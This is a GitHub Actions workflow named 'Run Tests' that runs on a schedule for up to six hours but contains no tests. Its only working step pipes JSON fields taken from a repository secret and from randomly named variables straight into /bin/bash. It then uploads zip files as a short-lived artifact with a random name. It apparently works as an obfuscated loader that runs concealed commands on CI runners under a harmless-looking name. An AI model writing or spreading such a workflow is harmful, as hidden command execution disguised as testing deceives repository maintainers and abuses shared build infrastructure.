name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '36 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          lqyev13: ${{ secrets.lqyev13 }}
        run: |
          printf '%s' "$lqyev13" | jq -r .xo69 | /bin/bash
          echo $vn91 | jq -r .no568 | /bin/bash
          echo $jrw039 | jq -r .ivoft9382 | /bin/bash
          printf '%s' "$zicf47" | jq -r .r69 | /bin/bash
          echo $dqyks35881 | jq -r .w01 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: 6vhEtxsq
          path: "*.zip"
          retention-days: 1
